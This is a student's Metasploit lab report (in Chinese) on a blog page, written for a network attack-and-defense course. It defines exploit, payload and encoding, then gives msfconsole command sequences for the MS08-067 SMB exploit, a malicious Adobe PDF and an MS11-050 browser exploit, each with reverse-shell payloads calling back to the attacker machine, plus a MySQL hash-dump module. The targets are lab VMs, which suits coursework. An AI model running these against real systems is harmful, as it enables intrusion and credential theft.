zoukankan      html  css  js  c++  java
  • 20155337《网络对抗》Exp5 MSF基础应用

    20155337《网络对抗》Exp5 MSF基础应用

    实践目标

    本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。具体需要完成:

    1.1一个主动攻击实践,如ms08_067;

    1.2 一个针对浏览器的攻击,如ms11_050;

    1.3 一个针对客户端的攻击,如Adobe;

    1.4 成功应用任何一个辅助模块。

    一、基础问题回答

    (1)用自己的话解释什么是exploit,payload,encode.

    • exploit:Exploit 的英文意思就是利用,它在黑客眼里就是漏洞利用。有漏洞不一定就有Exploit(利用),有Exploit就肯定有漏洞。
    • payload:payload
      病毒通常会做一些有害的或者恶性的动作。在病毒代码中实现这个功能的部分叫做“有效负载”(payload)。payload可以实现任何运行在受害者环境中的程序所能做的事情,并且能够执行动作包括破坏文件删除文件,向病毒的作者或者任意的接收者发送敏感信息,以及提供通向被感染计算机的后门。
    • encode:encode是编码,实现免杀,不让杀毒软件很轻易的就发现payload是攻击代码。

    二、实验内容

    1、1.Windows服务渗透攻击——MS08-067安全漏洞

    ①攻击机:kali ②靶机:windows XP SP3(English)

    在kali中输入msfconsole,然后依次输入一下命令:

    msf > use exploit/windows/smb/ms08_067_netapi
    msf exploit(ms08_067_netapi) > show payloads
    msf exploit(ms08_067_netapi) > set payload generic/shell_reverse_tcp //tcp反向回连
    msf exploit(ms08_067_netapi) > set LHOST 192.168.1.109//攻击机ip

    msf exploit(ms08_067_netapi) > set LPORT 5337 //攻击端口
    msf exploit(ms08_067_netapi) > set RHOST 192.168.1.111//靶机ip,特定漏洞端口已经固定

    msf exploit(ms08_067_netapi) >set target 0//自动选择目标系统类型,匹配度较高
    msf exploit(ms08_067_netapi) > exploit //攻击

    建立会话,攻击成功;

    2.针对Office软件的渗透攻击——MS10-087

    ①攻击机:kali ②靶机:windowsXP Professional sp2 ③Office版本:2003
    kali输入msfconsole进入控制台
    msf > use windows/fileformat/adobe_cooltype_sing
    msf exploit(adobe_cooltype_sing) > set payload windows/meterpreter/reverse_tcp //tcp反向回连
    msf exploit(adobe_cooltype_sing) > set LHOST 192.168.1.109 //攻击机ip
    msf exploit(adobe_cooltype_sing) > set LPORT 5337 //攻击端口
    msf exploit(adobe_cooltype_sing) > set FILENAME 20155337.pdf//设置生成pdf文件的名字
    msf exploit(adobe_cooltype_sing) > exploit //攻击

    将生成的pdf文件拷贝到靶机上。

    在kali上输入back退出当前模块,进入监听模块,输入以下命令:

    msf > use exploit/multi/handler //进入监听模块
    msf exploit(handler) > set payload windows/meterpreter/reverse_tcp //tcp反向连接
    msf exploit(handler) > set LHOST 192.168.1.109 //攻击机ip
    msf exploit(handler) > set LPORT 5337
    exploit

    在靶机上打开201553337.pdf文件

    攻击成功:

    3.辅助模块的应用:auxiliary/scanner/mysql/mysql_hashdump

    msf > use auxiliary/scanner/mysql/mysql_hashdump
    msf auxiliary(mysql_hashdump) > set RHOSTS 192.168.1.111
    msf auxiliary(mysql_hashdump) > set PASSWORD qjw
    msf auxiliary(mysql_hashdump) > set USERNAME qjw
    msf auxiliary(mysql_hashdump) > set THREADS 100
    msf auxiliary(mysql_hashdump) > exploit

    4.浏览器渗透攻击——MS11-050

    ①攻击机:kali ②靶机:WindowsXP Professional sp2/Windows7专业版 ③IE版本:7.0/8.0

    在kali中输入msfconsole进入控制台,依次输入以下指令:
    msf > use windows/browser/ms11_050_mshtml_cobjectelement
    msf exploit(ms11_050_cobjectelement) > set payload windows/meterpreter/reverse_http //http反向回连
    msf exploit(ms11_050_cobjectelement) > set LHOST 192.168.1.109 //攻击机ip
    msf exploit(ms11_050_cobjectelement) > set LPORT 5337 //攻击端口固定
    msf exploit(ms11_050_cobjectelement) > set URIPATH 20155337 //统一资源标识符路径设置
    msf exploit(ms11_050_cobjectelement) > exploit

    在浏览器输入http://192.168.1.109:8080/VDPKYzlYD
    ,IE出现弹窗,警告遇到问题需关闭程序:

    攻击失败!

  • 相关阅读:
    检测右键点击
    o(∩_∩)o. 原来如此,FLV或者流播放结束的事件不是STOP,而是Complete.
    epoll和selecter
    爬虫与Python:(四)爬虫进阶一之数据抓取——1.Ajax简介
    爬虫与Python:(四)爬虫进阶二之数据存储(文件存储)——1.Text存储
    Python之复制文件目录和快捷方式
    爬虫与Python:(三)基本库的使用——扩展:requests爬取阳光电影网源码
    Python内置函数str()——将对象转换为字符串
    爬虫与Python:(四)爬虫进阶一之数据抓取——2.Python模拟Ajax
    爬虫与Python:(三)基本库的使用——扩展:异常处理中except的用法和作用是什么
  • 原文地址:https://www.cnblogs.com/Twe1vE/p/8988028.html
Copyright © 2011-2022 走看看